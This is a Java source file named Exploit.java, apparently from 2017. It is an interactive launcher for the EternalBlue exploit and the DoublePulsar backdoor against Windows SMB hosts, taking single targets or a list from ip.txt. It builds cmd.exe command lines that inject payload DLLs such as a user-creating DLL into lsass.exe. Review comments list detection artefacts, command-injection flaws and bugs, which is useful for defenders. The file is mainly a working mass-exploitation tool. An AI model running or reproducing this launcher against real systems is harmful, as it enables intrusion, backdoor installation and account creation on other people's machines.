import java.io.BufferedReader;
import java.io.File;
import java.io.FileReader;
import java.io.InputStreamReader;
import java.net.URISyntaxException;
import java.net.URL;

/**
 * Created by 1135 on 2017/5/3.
 */
public class Exploit {

    /*
     * Interactive launcher that shells out, via cmd.exe, to the bundled
     * files\Eternalblue-2.2.0.exe and files\Doublepulsar-1.3.1.exe binaries and
     * writes each run's --OutConfig file under <jar dir>\logs. Every value typed
     * on stdin is concatenated straight into the command line without validation.
     *
     * Detection notes (everything here is visible in the code below): the
     * process tree is java -> cmd.exe -> cmd.exe -> files\Eternalblue-2.2.0.exe
     * or <jar dir>\files\Doublepulsar-1.3.1.exe, the full argument string
     * (--TargetIp, --TargetPort, --OutConfig, --DllPayload, ...) is on the child
     * command line and is also echoed to stdout, one logs\EB_<ip>_<port>.txt or
     * logs\DP_<ip>_<port>.txt file is left per target, and in "list" mode the
     * targets are read from ip.txt next to the jar.
     */

    /**
     * Runs {@code command} through two nested cmd.exe instances and echoes its
     * standard output.
     * <p>
     * The string is handed to {@link Runtime#exec(String)} unchanged, so any
     * cmd.exe metacharacters inside {@code command} are interpreted by the shell
     * (command injection when the value is not trusted). Only stdout is read;
     * stderr is never drained, which may stall the child if it writes a lot
     * there.
     *
     * @param command the cmd.exe command line to execute
     * @throws Exception any I/O failure while starting or reading the process
     */
    public void runCMD(String command) throws Exception {
        Process p = Runtime.getRuntime().exec("cmd /c cmd.exe /c " + command + " exit");//cmd /c dir   closes the window once the dir command has finished.


        //runCMD_bat("C:\\1.bat");/ invocation
        //Process p = Runtime.getRuntime().exec("cmd /c start cmd.exe /c " + path + " exit");//shows a window: opens a new window and runs the dir command in it (the original window closes)


        BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String readLine = br.readLine();
        // NOTE(review): the first line read above is never printed, and each
        // iteration reads the next line before printing, so the last iteration
        // prints "null".
        while (readLine != null) {
            readLine = br.readLine();
            System.out.println(readLine);
        }
        if (br != null) {
            br.close();
        }
        p.destroy();
        p = null;
    }





    /**
     * Prompts on stdin for a target IP (or {@code list}), a port and a target
     * OS, then launches files\Eternalblue-2.2.0.exe through
     * {@link #runCMD(String)} once per target.
     * <p>
     * With {@code list} (or an empty IP) the targets are read line by line from
     * ip.txt in the jar's directory; otherwise the single typed IP is used.
     * Results are written to logs\EB_&lt;ip&gt;_&lt;port&gt;.txt. The inner
     * read loop and the outer prompt block both catch {@code Exception} without
     * reporting it, so an unreadable ip.txt or a failing runCMD ends the method
     * silently. If the code-source URL cannot be converted to a URI,
     * {@code myfile} stays null and the following {@code getParentFile()} call
     * throws {@link NullPointerException}. The single-target branch passes a
     * relative --InConfig path while the list branch builds an absolute one, and
     * the exe path is relative in both, so the run depends on the working
     * directory being the jar directory.
     */
    public void EBexp_function() {




        URL url = getClass().getProtectionDomain().getCodeSource().getLocation();
        File myfile = null;
        try {
            myfile = new File(url.toURI());
        } catch (URISyntaxException e) {
            e.printStackTrace();
        }
        File dir = myfile.getParentFile(); //absolute directory that contains the jar





        String ip = null;
        String port = null;
        String TargetOS = null;
        BufferedReader br = new BufferedReader(new InputStreamReader(System.in));

        try {

            //ip
            System.out.println("input TargetIpAddress or list (Default. The 'list' will use ip.txt):");
            ip = br.readLine();
            //check before the command is executed
            // NOTE(review): no check is actually performed here; the raw line is
            // concatenated into the cmd.exe command string as-is.



            //port
            System.out.println("input TargetPort(Default:445):");
            port = br.readLine();
            if (port.equals("")) port = "445";
            //if port is empty, use 445; otherwise keep the user-entered value

            //TargetOS
            System.out.println("input TargetOS(Default:WIN72K8R2 other:XP):");
            TargetOS = br.readLine();
            if (TargetOS.equals("")) TargetOS = "WIN72K8R2";


            //the files folder holds the NSA tools
            //the dlls folder holds the x86/x64 payload dll files
            //the logs folder holds command output, named EB/DP_ip_port.txt, e.g. EB_192.168.0.1_445.txt


            if (ip.equals("list")||ip.equals("")) {
                /**
                 * Reads the file one line at a time; suited to character input, Chinese characters may come out garbled.
                 * Stream close order: the first opened is closed last, the last opened is closed first; otherwise java.io.IOException: Stream closed may occur.
                 */

                try {

                    //System.out.println(dir);

                    File file = new File(dir+File.separator+"ip.txt");
                    String tempString = null;

                    BufferedReader reader = null;
                    try {//read the file line by line, one whole line per read
                        reader = new BufferedReader(new FileReader(file));
                        int line = 1;
                        // read one line per iteration; null marks end of file
                        while ((tempString = reader.readLine()) != null) {
                            // show the line number

                            tempString = tempString.trim();
                            System.out.println(line + " CurrentIP "  + tempString);
                            System.out.println(tempString);
                            String EBexpCommand = "C:\\Windows\\System32\\cmd.exe /c files\\Eternalblue-2.2.0.exe --InConfig " + dir+File.separator+"files"+File.separator +"Eternalblue-2.2.0.xml"+ " --TargetIp " + tempString + " --TargetPort " + port + " --OutConfig " + dir+File.separator+"logs" +File.separator+"EB_" + tempString + "_" + port + ".txt" + " --Target " + TargetOS;

                            System.out.println(EBexpCommand);
                            runCMD(EBexpCommand);
                            line++;
                        }
                        reader.close();
                    } catch (Exception e) {
                        // NOTE(review): swallowed; a failure mid-list stops the loop with no message.
                    }
                    finally {
                        if (reader != null) {
                            try {
                                reader.close();
                            } catch (Exception e)
                            {
                                // ignored: the reader was already closed on the success path
                            }
                        }
                    }



                }
                catch(Exception e) {
                    e.printStackTrace();
                }

            } else {

                String EBexpCommand = "C:\\Windows\\System32\\cmd.exe /c files\\Eternalblue-2.2.0.exe --InConfig files\\Eternalblue-2.2.0.xml --TargetIp " + ip + " --TargetPort " + port + " --OutConfig " +dir+File.separator+"logs" +File.separator+"EB_" + ip + "_" + port + ".txt" + " --Target " + TargetOS;
                System.out.println(EBexpCommand);
                runCMD(EBexpCommand);
            }


        } catch (Exception e) {
            // NOTE(review): swallowed; prompt I/O errors and runCMD failures are lost here.
        }
    }






    /**
     * Prompts on stdin for the Doublepulsar parameters (target IP or
     * {@code list}, port, protocol, architecture, function, payload dll,
     * ordinal, process name, process command line, network timeout) and
     * launches &lt;jar dir&gt;\files\Doublepulsar-1.3.1.exe through
     * {@link #runCMD(String)} once per target.
     * <p>
     * Target selection and the ip.txt handling mirror {@link #EBexp_function()};
     * results go to logs\DP_&lt;ip&gt;_&lt;port&gt;.txt. Unlike the EB variant, a
     * missing ip.txt is reported on stderr and other inner failures print a
     * stack trace, but the outer prompt block still swallows every exception.
     * The same null {@code myfile} hazard after a {@link URISyntaxException}
     * applies. Every typed value, including the process command line, is
     * concatenated into the cmd.exe string without quoting or validation.
     */
    public void DPexp_function() {


        URL url = getClass().getProtectionDomain().getCodeSource().getLocation();
        File myfile = null;
        try {
            myfile = new File(url.toURI());
        } catch (URISyntaxException e) {
            e.printStackTrace();
        }
        File dir = myfile.getParentFile(); //absolute directory that contains the jar

        String networkTimeout = null;
        String ip = null;
        String port = null;
        String protocol = null;
        String architecture = null;
        String function = null;
        String payload = null;
        String dllordinal = null;
        String processName = null;
        String processCommandLine =null;



        BufferedReader br = new BufferedReader(new InputStreamReader(System.in));

        try {
            //ip
            System.out.println("input TargetIpAddress or list (Default. The 'list' will use ip.txt):");
            ip = br.readLine();
            //check before the command is executed
            // NOTE(review): no check is actually performed here; the raw line is
            // concatenated into the cmd.exe command string as-is.

            //port
            System.out.println("input TargetPort(Default:445):");
            port = br.readLine();
            if (port.equals("")) port = "445";
            //if port is empty, use 445; otherwise keep the user-entered value

            //protocol
            System.out.println("input protocol(Default:SMB other:RDP):");
            protocol = br.readLine();
            if (protocol.equals("")) protocol = "SMB";

            //architecture
            System.out.println("input architecture(Default:x64 other:x86):");
            architecture = br.readLine();
            if (architecture.equals("")) architecture = "x64";

            //Function
            // NOTE(review): the prompt below lacks a "\n" before "Uninstall", so it
            // is printed glued to "RunShellcode"; the default applied is "RunDLL"
            // while the prompt text says "RunDll".
            System.out.println("input Function(Default:RunDll): \n other:\nPing(Check whether the backdoor is installed)" +
                    "\nOutPutInstall(Generate a shellcode)" +
                    "\nRunShellcode" +
                    "Uninstall");

            function = br.readLine();
            if (function.equals("")) function = "RunDLL";

            //payload
            System.out.println("input payloadDllname(Default:x64createSysUser.dll other: X64reboot.dll X86reboot.dll x64createSysUser.dll x86createSysUser.dll your.dll):");
            payload = br.readLine();
            if (payload.equals("")) payload = "x64createSysUser.dll";

            //payloadDllOrdinal, default 1 : The exported ordinal number of the DLL being injected to call
            System.out.println("input payloadDllOrdinal(Default:1):");
            dllordinal = br.readLine();
            if (dllordinal.equals("")) dllordinal = "1";

            //ProcessName :: Name of process to inject into
            System.out.println("input ProcessName to inject into (Default:lsass.exe other:explorer.exe svchost.exe ):");
            processName = br.readLine();
            if (processName.equals("")) processName = "lsass.exe";

            //ProcessCommandLine :: Command line of process to inject into
            System.out.println("input ProcessCommandLine :: Command line of process to inject into (Default:\"\"):");
            processCommandLine = br.readLine();
            if (processCommandLine.equals("")) processCommandLine = "\"\"";

            //NetworkTimeout
            System.out.println("input NetworkTimeout(Default 60):");
            networkTimeout = br.readLine();
            if (networkTimeout.equals("")) networkTimeout = "60";

            if (ip.equals("list")||ip.equals("")) {
                /**
                 * Reads the file one line at a time; suited to character input, Chinese characters may come out garbled.
                 * Stream close order: the first opened is closed last, the last opened is closed first; otherwise java.io.IOException: Stream closed may occur.
                 */

                try {

                    //System.out.println(dir);

                    File file = new File(dir+File.separator+"ip.txt");
                    BufferedReader reader = null;
                    try {//read the file line by line, one whole line per read
                        reader = new BufferedReader(new FileReader(file));
                        String tempString = null;
                        int line = 1;
                        // read one line per iteration; null marks end of file
                        while ((tempString = reader.readLine()) != null) {
                            // show the line number
                            // NOTE(review): unlike EBexp_function, the line is not trimmed here.
                            System.out.println(line + " CurrentIP "  + tempString);

                            String DPexpCommand = "C:\\Windows\\System32\\cmd.exe /c "+ dir +File.separator+"files"+File.separator+"Doublepulsar-1.3.1.exe --InConfig " + dir+File.separator+"files"+File.separator +"Doublepulsar-1.3.1.xml --TargetIp " + tempString + " --TargetPort " + port + " --OutConfig " + dir+File.separator+"logs" +File.separator+ "DP_" + tempString + "_" + port + ".txt" + " --Protocol " + protocol + " --Architecture " + architecture + " --Function " + function + " --DllPayload " +dir +File.separator+"dlls"+File.separator+payload +" --payloadDllOrdinal "+dllordinal+" --ProcessName "+processName+" --ProcessCommandLine "+processCommandLine+" --NetworkTimeout "+networkTimeout;
                            System.out.println(DPexpCommand);
                            runCMD(DPexpCommand);

                            line++;
                        }
                        reader.close();
                    } catch (java.io.FileNotFoundException e)
                    {
                        System.err.println("Can't find file ip.txt in jar file directory.");
                    }
                    catch (Exception e) {
                        e.printStackTrace();
                    }
                    finally {
                        if (reader != null) {
                            try {
                                reader.close();
                            } catch (Exception e)
                            {
                                // ignored: the reader was already closed on the success path
                            }
                        }
                    }


                }
                catch(Exception e) {
                    e.printStackTrace();
                }

            } else {

                //System.out.println(networkTimeout+ip+port+processCommandLine+protocol);

                            /*
                            String networkTimeout = null;
                            String ip = null;
                            String port = null;
                            String protocol = null;
                            String architecture = null;
                            String function = null;
                            String payload = null;
                            String dllordinal = null;
                            String processName = null;
                            String processCommandLine =null;
                            */



                String DPexpCommand = "C:\\Windows\\System32\\cmd.exe /c "+ dir +File.separator+"files"+File.separator+"Doublepulsar-1.3.1.exe --InConfig " + dir+File.separator+"files"+File.separator +"Doublepulsar-1.3.1.xml --TargetIp " + ip + " --TargetPort " + port + " --OutConfig " + dir+File.separator+"logs" +File.separator+ "DP_" + ip + "_" + port + ".txt" + " --Protocol " + protocol + " --Architecture " + architecture + " --Function " + function + " --DllPayload " +dir +File.separator+"dlls"+File.separator+payload +" --payloadDllOrdinal "+dllordinal+" --ProcessName "+processName+" --ProcessCommandLine "+processCommandLine+" --NetworkTimeout "+networkTimeout;
                System.out.println(DPexpCommand);
                runCMD(DPexpCommand);
            }

        } catch (Exception e)

        {
            // NOTE(review): swallowed; prompt I/O errors and runCMD failures are lost here.
        }

        //System.out.println(new Date());
        //runCMD_bat(DPexpCommand);
        //System.out.println(new Date());
    }
}